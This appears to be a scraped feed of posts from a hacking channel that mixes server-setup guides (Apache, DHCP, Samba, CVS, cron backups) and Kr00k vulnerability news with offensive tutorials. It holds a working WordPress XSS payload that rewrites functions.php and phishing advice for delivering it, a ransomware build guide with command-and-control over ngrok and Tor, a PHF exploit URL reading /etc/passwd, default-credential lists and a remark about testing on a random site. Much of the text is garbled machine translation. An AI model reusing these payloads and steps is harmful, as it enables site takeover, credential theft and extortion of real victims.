▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Wordpress bruteforce :lastest tool
t.me/UndercOdeTesting

1) Brute Force via API, not login form bypassing some forms of protection

2) Can automatically upload an interactive shell

3) Can be used to spawn a full featured reverse shell

4) Dumps WordPress password hashes

5) Can backdoor authentication function for plaintext password collection

6) Inject BeEF hook into all pages

7) Pivot to meterpreter if needed

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) sudo apt install python3-pip python3-libtorrent python3-coloredlogs

2) git clone https://github.com/BlackArch/wordlistctl

3) cd wordlistctl

4) Open the requirements.txt file

> gedit requirements.txt
And remove the line from there

libtorrent

5) Then continue:

> sudo pip3 install -r requirements.txt

> python3 ./wordlistctl.py

🦑 In BlackArch, this program is in the standard repository – install directly

> sudo pacman -S wordlistctl

wordlistctl -S rus

--==[ wordlistctl by blackarch.org ]==--

[*] searching for rus in urls.json

[+] wordlist russian_users found: id=842
[+] wordlist rus_surnames_date099_fin found: id=1022
[+] wordlist rus_surnames_first_letter found: id=1046
[+] wordlist rus_surnames_fin found: id=1094
[+] wordlist rus_surnames_date19002020_fin found: id=1104
[+] wordlist rus_names_date099_fin found: id=1163
[+] wordlist rus_names_translit found: id=1185
[+] wordlist rus_cities_translit found: id=1206
[+] wordlist rus_names_date19002020_fin found: id=1209
[+] wordlist rus_eng found: id=1245
[+] wordlist rus_names_fin found: id=1278
[+] wordlist rus_mat found: id=1316
[+] wordlist rus_latin found: id=1323
[+] wordlist rus_names_kb_chage found: id=1324

6) mkdir wordlists

> And download to this folder (-d wordlists) a dictionary that has the identifier 1714 (-f 1714), unpack it and delete the original archive (-Xr):

>wordlistctl -f 1714 -d wordlists -Xr

@UndercOdeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Tried on random ruso site to test it

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Apache-Team development environment setup: dhcp + apache + ftp + cvs + samba :
Let s introduce those therms :
instagram.com/UndercOdeTestingCompany

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

> Many of these services are based on the fact that most development clients are still set by Windows. Each service provides a simple basic configuration demonstration. Including:

1) IP management (DHCP): management and analysis of server IP address (combined with SAMBA WINS service), development of client IP management; WEB service (APACHE): document sharing, CVS web interface browsing, forum tools, etc .;

2) FTP service (FTP): for file download / share;

version control (CVS): version control of program source code and documentation;

> File sharing (SAMBA): NETBIOS-based file sharing for easy access by Windows clients (such as the installation of some tools); Database server (MYSQL): a background database service for some applications; Backup mechanism (wget + rsync): Back up

3) many settings It is the default. In the bash environment and in the tcsh environment, some settings are not constant.

🦑 Server plan as follows:


Primary Server (Main) backup server (Backup)
__________________ _______________
| APACHE the WEB SERVER | | File Backup |
| SAMBA SHARE | | |
| the DHCP SERVER | | the DHCP Backup |
| CVS SERVER | | MySQL Server |
| GNATS SERVER | | |
| PHORUM SERVER | | |
| Database backup | | |
------------------ ---------------

4) Hardware Preparation : At least 2 servers

In theory, any system crash is only a matter of time, and no one can guarantee that the developer will not make a mistake

. The only solutions are: backup, backup, backup ... The

operating system prepares

5) FreeBSD or GNU / Liunx. When the system is installed, the configuration of this article Take RedHat as an example. Note: When installing, select the "Development Tools" category. Many of the following tools need to be compiled with GCC. Some application scripts use PERL. The two master servers use IP addresses 192.168.0.200 and 192.168.0.201, respectively.

Written by Underc0de
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Let s configure our apache server config :

<> dhcp + apache + ftp + cvs + samba :
twitter.com/UndercOdeTC/

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) Services installed on both machines: SSH FTP DHCP service

SSH: Basic login service. For internal development, it is generally acceptable to use the default, but it is recommended to

2) change : PermitRootLogin yes in / etc / ssh / sshd_config PermitRootLogin no

3) FTP: If it is FREEBSD, it is recommended to use PROFTPD instead: http://www.proftpd.org/Install (if service down try later )

tar zxf proftpd-version.tar.gz
cd proftpd-version /
./configure
make
make install

4) Default configuration / usr /local/etc/proftpd.conf


> ServerName "ProFTPD"
ServerType standalone
DefaultServer on
AllowOverwrite on
Port 21
Umask 022 #Do
not reverse resolve the domain name of the login machine
UseReverseDNS off
MaxInstances 30
User nobody
Group nogroup

5) DHCP service: In order to more easily manage the developer's IP address and server IP address in the same LAN, the most It is good to arrange the server within a certain range of static IP (such as above 192.168.0.200), and provide a dynamic IP for the client of the development machine within the range of (192.168.0.10-200). Assume that our main server (192.168.0.200) and auxiliary development server (192.168.0.201) use static IP, and provide dynamic IP allocation services for 192.168.0.10-200 in the network segment. The DHCP service is installed on both servers.


6) One is the master DHCP service, which is used to provide 70% of the IP to the subnet IP pool, and the other is used for backup, which has 30% of the IP pool. In the example: 200 is responsible for 10-100 and 201 is responsible for 110-150. If dhcpd is not installed by default, find the DHCP software package from the installation disk or download the source file from http://www.isc.org and compile it (the installation location and configuration file may be different).

7) Default configuration: on the master server

ddns-update-style none;
default-lease-time 120000;
max-lease-time 920000;
option subnet-mask 255.255.255.0;
option broadcast-address 192.168.0.255;
option netbios-name-servers 192.168.0.200;
option routers 192.168 .0.1;
Option-name-Domain Servers 202.106.196.115,202.96.199.133;
; "the example.com" Option name-Domain

Subnet 192.168.0.0 Netmask 255.255.255.0 {
Range 192.168.0.10 192.168.0.100;
}

8) Note:

The default per IP leases for 2 days: default-lease-time 120000;

longest lease: max-lease-time 920000;

default subnet mask: option subnet-mask 255.255.255.0;

default broadcast address: option broadcast-address 192.168.0.255;

9) Enable the samba service on 192.168.0.200 to enable the WINS service: for internal domain name resolution: option netbios-name-servers 192.168.0.200;

Written by Underc0de
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Default Configuration should be in server
pinterest.com/UndercOdeOfficial

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) default gateway option routers 192.168.0.1;

2) default domain name server option domain-name-servers 202.106.196.115 , 202.96.199.133; The

3) default domain name option domain-name "example.com"; #A

4) default subnet setting:
subnet 192.168.0.0 netmask 255.255.255.0 {
# Dynamically allocate 0.10-100 IP
range 192.168. For the subnet 0.10 192.168.0.100;
} The

5) only difference on the secondary DHCP server is that the subnet is dynamically assigned an IP of 0.110-150, and the IP pools of the primary DHCP and the attached DHCP server cannot overlap each other


subnet 192.168.0.0 netmask 255.255.255.0 {
range 192.168 .0.110 192.168.0.150;
}

🦑 Application installation on the main server:

SAMBA service: used for file sharing and internal WINS analysis

Here is just a simple configuration for read-only sharing,


[global]
#Other people will see through "My Network Places" In the WORKGROUP group


1) Linux machine, the comment is: My Samba Server
workgroup = WORKGROUP
netbios name = linux
server string = My Samba Server #log

2) settings
log file = /var/log/samba/%m.log
max log size = 50 #Security

3) settings
security = share

#Use SAMBA's WINS service support, and use / etc / hosts for internal domain name resolution
wins support = yes
name resolve order = hosts lmhosts wins bcast
dns proxy = yes

[public] #A
shared setting
comment = Public Stuff
path = / home / share
public = yes
guest ok = yes
read only = yes
writable = no
printable = no

4) In order to let everyone use dev.example.com to access the main server (192.168.0.200) internally, I use DHCP to set the main server (192.168.0.200) as the internal WINS server, and in the 200 SAMBA service, WINS support is enabled, and WINS is set to use DNS for NETBIOS name resolution. In this way, if the DNS reads the settings in the / etc / hosts file, the hosts file can be used as the WINS domain name configuration file, which is set in / etc / hosts:


192.168.0.200 dev.example.com bbs.example. After com dev bbs
192.168.0.201 bak.example.com backup

, the intranet client that obtained the IP through DHCP can directly access the development server through: dev.example.com.

5) used abbreviations for all machine name prefixes: dev, bbs bak, etc. The reason is that the NMBD of samba is actually the resolution of the NETBIOS name, and the name length is limited to 16 characters (actually 15). Therefore, although 192.168.0.202 username.example.com is a legal DNS name resolution, because username.example.com is longer than 16 characters, it cannot be found through SAMBA WINS service resolution. dev.chedong.com is equivalent to a machine like dev.chedong.com. When I used SAMBA's WINS analysis, the client always couldn't ping test.chedong.com. This problem bothered me for a while.


Written by Underc0de
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 WEB service: APACHE-lastest config-usage... :
twitter.com/UndercOdeTC

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) It is mainly used for file WEB sharing and front-end browsing of some applications (CVSWEB GNATSWEB PHPMYADMIN, etc.). Apache, 1.3 is still used here, because many applications, such as PHP running on 2.0, are not complete.

Installation: http://httpd.apache.org Download the latest version:

2) Compile options: This allows all modules to be dynamically loaded through the configuration file, which is convenient for adding and removing other application modules later: ./configure --prefix = / home / apache --enable-shared = max --enable-module = most More installation instructions can refer to: APACHE installation notes

🦑 Document sharing tips:

1) For the sharing of documents, the autoindex module is very useful, let APACHE automatically index the directory by default Sort by file / directory name, and more than 40 characters of the file name are truncated. In order to display the complete file name, and like the Explorer, the directory is ranked first, and the file is ranked behind:

2)in the module settings :


#Add NameWidth option, and the file name length is * (Automatically adapted #should
be the longest file name in the current directory)
#Add FoldersFirst option, let the directory be listed in front (similar to Explorer)
#Added ScanHTMLTitles for HTML files TITLE do
the description of file #, and set the description length to * (the longest adaptive)
IndexOptions FancyIndexing + NameWidth = *
FoldersFirst S canHTMLTitles + DescriptionWidth = *

3) If it is CGI development, how to enable users to publish CGI programs in their own directory, such as: http://192.168.0.200/~chedong/cgi-bin/my_cgi: In the module settings, add a regular expression: ScriptAliasMatch ~ ([az] +) / cgi-bin /(.*) / home / $ 1 / cgi-bin / $ 2

means match ~ user_name / cgi-bin / cgi_name is automatically mapped to / home / user_name / cgi-bin / cgi- script name

version control: CVS

CVS default on almost all servers installed, as long as you can initialize the following steps:

in / etc / profile Lane:

master CVS repository resides settings:


Export CVSROOT = / Home / cvsroot

4) in other Settings in the development server:


export CVSROOT =: ext: $USER@192.168.0.200: / home / cvsroot
export CVS_RSH = ssh

and then initialize cvs init on the main server:

5) For the settings of CVSWEB, repeat the content of CVSWEB in the following CVS common command manual :

Download of CVSWEB: CVSWEB has evolved from the original version to a lot of richer functional interface versions. This is personally convenient to install and set up: http://www.spaghetti-code.de/software/linux/cvsweb/

6) Download Unpacking:


tar zxf cvsw eb.tgz

7) You can also customize the description information in the header of the conf. You can modify $ long_intro to the text you need. The first thing that CVS can put into the library is the installation documentation of the above system. For more extended applications of CVS, please refer to the CVSTRAC section of the CVS common command manual. Resource sharing between multiple services Generally can be resolved through links, for example: I want anonymous ftp shared content (such as in the / var / ftp / pub directory) can be published by WEB, ln -s / var / ftp / pub / home / apache / htdocs / pub

🦑
　　I hope that the documents in / usr / share / doc can be browsed through the WEB:


　　ln -s / usr / share / doc / home / apache / htdocs / doc

　　I hope that the content published by the WEB can also be accessed through the Windows network neighbors: suppose / home / share is the read-only share path published by samba.


　　ln -s / home / apache / htdocs / home / share

　　service starts automatically:

　　services already installed on the system can generally be configured to automatically start through the setup service configuration. Otherwise, it is located at / Add some startup scripts in etc / rc.local.


Written by Underc0de
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 example for writing the following script in the ROOT CRON of the main server
t.me/UndercOdeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

#time sync
0 5 * * 1 (/ usr / bin / rdate -s YOUR_DATE_TIME_SERVER)

#backup gnats
6 3 * * * (cd / home; tar cf
/home/backup/gnats.date + \% w.tar gnats) #backup

cvsroot
5 3 * * * (cd / home; tar cf
/home/backup/cvsroot.date + \% w .tar cvsroot)

#backup apache
8 3 * * * (cd / home; tar cf
/home/backup/apache.date + \% w.tar apache)

#gzip all backup
50 3 * * * (gzip -f / home / backup / *. tar)

#webalizer demo
3 5 * * * (/ usr / local / bin / webalizer -c /home/apache/conf/webalizer.conf
/ home / apache / logs / `date -d yesterday +
% w` / access_log)

#remove last week log
3 4 * * * (find / home / apache / logs / -name
access_log -mtime +6 -exec rm -f {};) In

🦑 this way, there will be weekly rotation training in the / home / backup directory 7 backups. Then by setting CRON on the secondary server, use the -m option of wget to mirror the / home / backup directory on the primary server or use rsync to synchronize. The next two are about the log statistics of the server using webalzier, and the logs of APACHE are rotated through cronolog. Please refer to the specific settings

Written by Underc0de
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 AFTER THOSE TUTORIALS YOU ARE ABLE TO CONFIG ANY APACHE SERVER AND FULL UNDERSTANDING HOW THEY WORKS
E N J O Y @UndercOdeTesting

🦑No One Have Permission to clone UndercOde Tutorials

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Wi-Fi vulnerability Kr00k exposure: billions of devices worldwide affected CVE
recently from Underc0de Tweets @UndercOdeTC

1) Wi-Fi chips manufactured by Cypress Semiconductor and Broadcom have serious security vulnerabilities, making billions of devices around the world very vulnerable to hackers, allowing attackers to decrypt the airborne transmissions around him. Sensitive data.

2) The vulnerability was made public during the RSA Security Conference that opened today. For Apple users, this issue has been resolved in the iOS 13.2 and macOS 10.15.1 updates released in late October last year.

3) The security company ESET detailed this vulnerability at the RSA conference. Hackers can use a vulnerability called Kr00k to interrupt and decrypt WiFi network traffic. The vulnerability exists in Wi-Fi chips from Cypress and Broadcom, which are two major brands with high global market shares, which are widely used from laptops to smartphones, from APs to IoT devices.

4) Among them are Amazon Echo and Kindle, Apple's iPhone and iPad, Google's Pixel, Samsung's Galaxy series, Raspberry Pi, Xiaomi, Asus, Huawei and other brand products are used. A conservative estimate is that one billion devices worldwide are affected by the vulnerability.

5) After the hacker successfully exploited this vulnerability, he could intercept and analyze the wireless network data packets sent by the device. Ars Technica stated:

6) Kr00k exploits a vulnerability that occurs when a wireless device disconnects from a wireless access point. If an end-user device or AP hotspot is attacked, it will put all unsent data frames into the send buffer and then send them wirelessly. Instead of using a session key previously negotiated and used during normal connections to encrypt this data, the vulnerable device uses a key consisting of all zeros, which makes decryption impossible.

7) A good thing is that the Kr00k error only affects WiFi connections encrypted using WPA2-Personal or WPA2-Enterprise security protocols and AES-CCMP. This means that if you use Broadcom or Cypress WiFi chipset devices, you can prevent hackers from using the latest WiFi authentication protocol WPA3 to attack.

8) According to ESET Research, which released detailed information about the vulnerability, the vulnerability has been disclosed to Broadcom and Cypress along with potentially affected parties. Currently, device patches for most major manufacturers have been released.


Written by Underc0de
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 XSS in WordPress: a tutorial Full by UndercOde :
1) One of the most common vulnerabilities in WordPress plugins is cross site scripting – XSS for short. The basic premise of XSS is that an attacker is able to cause JavaScript to run in somebody else’s browser, while they’re on a website that the attacker shouldn’t be able to control.
2) By the end of this, you’ll have introduced a vulnerability, proven that it’s vulnerable
t.me/UndercOdeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) Make your site vulnerable
(Tip: Probably best not to do this on a production site)
There are many ways to make your site vulnerable to XSS. But in the interest of brevity, we’ll choose the quickest and easiest way to do it. Create a new post on your WordPress site, as an admin user, switch the editor into Text mode, and add this and click publish:

<script>eval(window.location.hash.substring(1))</script>
Congratulations, your site is vulnerable to XSS.

2) Writing a malicious payload
We can do a lot of things. We could create a new user, we could delete all the posts, but today let’s do the worst thing possible and execute arbitrary code on the server.

> By default, WordPress lets you edit theme and plugin files. You absolutely should turn this off. Somebody with malicious intentions can do a lot of damage with it. As we’re about to find out…

3) You can edit the current theme’s functions.php file from /wp-admin/theme-editor.php?file=functions.php

4) Open up your devtools and execute this (no really, don’t do this on your production site!):

nc=document.querySelector('#newcontent');nc.value='<?php echo "HACK THE PLANET";phpinfo();exit()?>'+nc.value;nc.form.submit.click()
Ooh, that’s going to be annoying. We haven’t done too much damage though, so open up functions.php in your text editor and remove the defacement (i.e. replace the first line with <?php).

5) Now we have a proof of concept and a malicious payload we want to execute. We just need to put those pieces together, along with a little extra JavaScript to open that page in an iframe, and we’ll have something ready to do some damage…

6) Visit your vulnerable page, and add the following to the end of the URL (you may need to refresh after doing that):

#i=document.createElement('iframe');document.body.appendChild(i);i.src='/wp-admin/theme-editor.php?file=functions.php';window.setTimeout(function(){nc=i.contentDocument.querySelector('#newcontent');nc.value='<?php echo "HACK THE PLANET";phpinfo();exit()?>'+nc.value;nc.form.submit.click()},3000)
Now you’ve defaced your entire site just by following a link. If you can run arbitrary JavaScript on a WordPress site you can do virtually anything an admin user can do, including (by default) execute arbitrary PHP.

7) Delivery
To deliver your link you’ll need to use some social engineering.

Firstly, a URL shortener is handy – a bit.ly link might look suspicious, but less suspicious than a huge URL full of JavaScript.

You could make an email that looks exactly like a Facebook notification. You could even buy a domain name, set it up to redirect to the malicious URL, and rent a billboard outside their office. Get creative.

🦑 exploit that does a bit of damage.

We learnt that if you can run alert(1) then you can probably run any JavaScript.

We’ve also learnt that by default, an XSS vulnerability in WordPress allows attackers to run arbitrary PHP code. This is why XSS in WordPress is particularly dangerous.

🦑Proof of concept
I claimed that your site is vulnerable to XSS, but is it really? Don’t take my word for it, let’s prove it.

Visit the page you just created, and then add #alert(1) to the end of the URL. (You may need to refresh after doing that).

You should see an alert box saying “localhost says: 1” or just “1”.

This is called a “proof of concept”. We’ve proven that we can control the JavaScript running on this site without being admins.

Written by Underc0de
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Ransomware Updated Tutorial :
t.me/UndercOdeTesting

🦑 Features :

1)Run in Background (or not)

2) Encrypt files using AES-256-CTR(Counter Mode) with random IV for each file.
Multithreaded.

3) RSA-4096 to secure the client/server communication.

4) Includes an Unlocker.

5) Optional TOR Proxy support.

6) Use an AES CTR Cypher with stream encryption to avoid load an entire file into memory.

7) Walk all drives by default.

8) Docker image for compilation.

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) download the project outside your $GOPATH:

2) git clone github.com/mauri870/ransomware

3) cd ransomware
If you have Docker skip to the next section.

4) You need Go at least 1.11.2 with the $GOPATH/bin in your $PATH and $GOROOT pointing to your Go installation folder. For me:

export GOPATH=~/gopath
export PATH=$PATH:$GOPATH/bin
export GOROOT=/usr/local/go
Build the project require a lot of steps, like the RSA key generation, build three binaries, embed manifest files, so, let's leave make do your job:

5) make deps
make

6) You can build the server for windows with make -e GOOS=windows.

🦑 Docker

./build-docker.sh make

Config Parameters

7) You can change some of the configs during compilation. Instead of run only make, you can use the following variables:

HIDDEN='-H windowsgui' # optional. If present the malware will run in background

USE_TOR=true # optional. If present the malware will download the Tor proxy and use it to contact the server

SERVER_HOST=mydomain.com # the domain used to connect to your server. localhost, 0.0.0.0, 127.0.0.1 works too if you run the server on the same machine as the malware

SERVER_PORT=8080 # the server port, if using a domain you can set this to 80

GOOS=linux # the target os to compile the server. Eg: darwin, linux, windows
Example:

make -e USE_TOR=true SERVER_HOST=mydomain.com SERVER_PORT=80 GOOS=darwin

The SERVER_ variables above only apply to the malware. The server has a flag --port that you can use to change the port that it will listen on.

DON'T RUN ransomware.exe IN YOUR PERSONAL MACHINE, EXECUTE ONLY IN A TEST ENVIRONMENT! I'm not resposible if you acidentally encrypt all of your disks!

🦑How it Works :

1) First of all lets start our external domain:

ngrok http 8080
This command will give us a url like http://2af7161c.ngrok.io. Keep this command running otherwise the malware won't reach our server.

2) Let's compile the binaries (remember to replace the domain):

make -e SERVER_HOST=2af7161c.ngrok.io SERVER_PORT=80 USE_TOR=true
The SERVER_PORT needs to be 80 in this case, since ngrok redirects 2af7161c.ngrok.io:80 to your local server port 8080.

3) After build, a binary called ransomware.exe, and unlocker.exe along with a folder called server will be generated in the bin folder. The execution of ransomware.exe and unlocker.exe (even if you use a diferent GOOS variable during compilation) is locked to windows machines only.

4) Enter the server directory from another terminal and start it:

cd bin/server && ./server --port 8080

5) To make sure that all is working correctly, make a http request to http://2af7161c.ngrok.io:

curl http://2af7161c.ngrok.io
If you see a OK and some logs in the server output you are ready to go.

6) Now move the ransomware.exe and unlocker.exe to the VM along with some dummy files to test the malware. You can take a look at cmd/common.go to see some configuration options like file extensions to match, directories to scan, skipped folders, max size to match a file among others.

Then simply run the ransomware.exe and see the magic happens

🦑 I Post this ransoware tutorial from his git link for learn not for harm

@UndercOdeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Detailed hack into LINUX server-part 1 (plan)
>Crack the password

1) In the UNIX operating system, all system user passwords are stored in a file, this file is stored in the / etc directory, its file name is called passwd.

2) If the reader thinks that the work to be done is to get this file and log in to the system with the above password, then it is very wrong. The psswd file under UNIX and Linux is special.

3) The passwords of all accounts in it have been recompiled (that is, the DES encryption method mentioned earlier), and these passwords are compiled unidirectionally (one -way encrypted), which means there is no way to decompile it.

4) there are programs that can get these raw passwords. The author recommends a cracker program "Cracker Jack", which is also a software that uses a dictionary to exhaust the dictionary files.

5) "Cracker Jack" will compile each value in the dictionary file, and then compare the compiled value with the content in the password file.

6) If the same result is obtained, the corresponding uncompiled password will be reported. This software cleverly bypasses the limitation that passwords cannot be decompiled, and uses exhaustive comparison to obtain passwords. There are many tools for obtaining passwords using this principle, and readers can search on the Internet.
t.me/UndercOdeTesting

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Detailed hack into LINUX server-part 2 starting attack :
t.me/UndercOdeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) getting the password file
is the most difficult part. Obviously, if the administrator has such a password file, he will certainly not put it there for others to get it comfortably.
> can use john the ripper gd as well see next tutorial how to use it

2) The intruder must find a good way to get the password file without entering the system. Here the author introduces two methods to you, you can try, it may succeed.

> 1.tc directory will not be locked on the FTP service. Intrusion can use the FTP client program to log in with an anonymously anonymous account, and then check if / etc / passwd is set to be read anonymously.

3) If there is a backup, use it immediately. Software decoding.

4) On some systems, there will be a file called PHF in the / cgi-bin directory. It will be more convenient if it is available on the server to be hacked. Because PHF allows users to remotely read files in the website system, based on this, users can use a browser to grab the psswd file, just type the URL in the browser address bar: http://xxx. xxx .xxx / cgi-bin / phf? Qalias = x% 0a / bin / cat% 20 / etc / passwd , where xxx.xxx.xxx is the name of the website to be hacked.


5) If neither of these methods work, the intruder must implement other methods.

> In some cases, the second part of the password file found by the intruder is X,!, Or *, then the password file is locked, which is one of the methods used by system administrators to strengthen security.

6) However, it is rare that the password file is completely hidden. Under normal circumstances, an unlocked password file is backed up in the system, so that intruders can use it.
> For example: the intruder usually looks for the / etc / shadow directory or a similar directory to see if a backup of the password file can be found .

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Let s hack the linux server part 3:(after cracking the login pass)
fb.com/UndercOdeTestingCompany

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) Let s establish our own shell account

After two, three or two key steps, the intruder finally got the key password file, and cracked the password. Now you can run the TELNET program and log in to the host.

2) When connected to the server, the server will show you some information, usually U NIX, linux, aix, irix, ultrix, bsd or even DOS and VAX / Vms; then the Login prompt appears on the screen, then type You can log in to the system with the obtained account and password. At this point, the intruder can use his UNIX knowledge to do what he likes to do.

3) Finally, do an analysis of a password file, the file content is as follows:
root: 1234aaab: 0: 1: Operator: /: / bin / csh
nobody: *: 12345: 12345 :: /:
daemon: *: 1: 1: : /:
sys: *: 2: 2 :: /: / bin / csh
sun: 123456hhh: 0: 1: Operator: /: / bin / csh
bin: *: 3: 3 :: / bin:
uucp: *: 4: 8 :: / var / spool / uucppublic:
news: *: 6: 6 :: / var / spool / news: / bin / csh
audit: *: 9: 9 :: / etc / security / audit: / bin / csh
sync :: 1: 1 :: /: / bin / sync
sysdiag: *: 0: 1: Old System
Diagnostic: / usr / diag / sysdiag: / usr / diag / sysdiag / sysdiag
sundiag: *: 0: 1: System
Diagnostic: / usr / diag / sundiag: / usr / diag / sundiag / sundiag
tom: 456lll45uu: 100: 20 :: / home / tom : / bin / csh
john: 456fff76Sl: 101: 20: john: / home / john: / bin / csh
henry: AusTs45Yus: 102: 20: henry: / home / henry: / bin / csh
harry: SyduSrd5sY: 103: 20 : Harry: / Home / Harry: / bin / csh
Steven: GEs45Yds5Ry: 104: 20 is: Steven: / Home / Steven: / bin / csh
+ :: 0: 0 :::

4) wherein the ":" field is divided into several For example: tom: 456lll45uu: 100: 20: tomchang: / home / tom: / bin / csh The meaning is:
User Name: tom
Password: 456lll45uu
User No: 100
Group No: 20
Real Name: tom chang
Home Dir: / home / tom
Shell: / bin / csh

5) Readers can find the above password fields such as nobody, daemon, sys, bin, uucp, news, audit, sysdiag, sundiag, etc. Yes *, which means that the passwords of these accounts are locked and cannot be used directly.

6) It is worth noting that many systems will have some default accounts and passwords after the first installation, which is convenient for speculative hackers. Here are some default accounts and passwords under UNIX.
ACCOUNT PASSWORD
----------- ----------------
root root
sys sys / system / bin
bin sys / bin
mountfsys mountfsys
adm adm
uucp uucp
nuucp anon
anon anon
user user
games games
install install
reboot for "command login" use
demo demo
umountfsys umountfsys
sync sync
admin admin
guest guest
daemon daemon

7) where root mountfsys umountfsys install (sometimes also sync) is a root-level account, that is, it has sysop (system administrator) permissions.

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Now After Cracking A linux server wanna analyse The log file :
fb.com/UndercOdeTestingCompany

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) it is necessary to introduce the UNIX log files. Many intruders don't want hacked computers to track them, how do they do that.

2) The system administrator mainly relies on the system's LOG, which is often called the log file, to obtain the traces of the intrusion and the IP and other information of the intruder. Of course, some administrators use third-party tools to record information about intruding into a computer. Here we mainly talk about files that record intrusion traces in general U NIX systems.

3) There are several versions of UNIX systems, each system has different LOG files, but most should have about the same storage location, the most common location is the following several:
/ usr / adm, earlier versions of UNIX;
/ var / adm, newer versions use this location;
/ var / log, some versions of Solaris, Linux BSD, Free BSD use this location;
/ etc, most UNIX versions put utmp here, some also put wtmp here This is also the location of syslog.conf.

4) The functions of some files are listed below, of course, they also differ according to different invaded systems.

> acct or pacct, which records the command records used by each user;
access_log, which is mainly used to run NCSA HTTPD on the server, what sites in this log file will connect to your server
aculog, which holds the MODEMS record you dialed out;
lastlog, which records the user's recent login record and the initial destination of each user, sometimes the last unsuccessful login;
loginlog, which records some abnormal login records;
messages , Record the output output to the system console, and other information is generated by syslog;
security, record some cases of using the UUCP system to attempt to enter the restricted range;

>sulog, record the record using the su command;
utmp, record the current login to the system For all users, this file changes constantly as the user enters and leaves the system;
utmpx, an extension of UTMP;
wtmp, records user login and logout events;
syslog, the most important log file, is obtained using the syslogd daemon.

🦑 Log information:

1) / dev / log, a UNIX domain socket that accepts messages generated by processes running on the local machine;

2) / dev / klog, a device that receives messages from the UNIX kernel;
port 514, an Internet socket , Accepting syslog messages generated by other machines via UDP;

3) Uucp, the recorded UUCP information, can be updated by local UUCP activities, and can also be modified by actions initiated by remote sites. The information includes calls made and accepted, requests made, sender , Sending time and sending host;

4) lpd-errs, a log that handles printer fault information;
ftp log, you can obtain the recording function by executing ftpd with the -l option;
httpd log, HTTPD server records each web access record in the log;
History log, this file keeps a record of the user's recent input commands;
vold.log, records errors encountered when using external media.

5) The above introduces the main steps of hacking the server, and the reader should now have some basic knowledge about it. It needs to be emphasized again that if the reader lacks knowledge of the UNIX system, it is absolutely impossible to master it.

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 How To Use Johna The Ripper-Full :Crack anything with your windows -linux :
twitter.com/UndercOdeTC

1) Download https://www.openwall.com/john/ (official )

2) let s try on any windows 10

from cmd go to dir <folder name... >

3) run .\john.exe
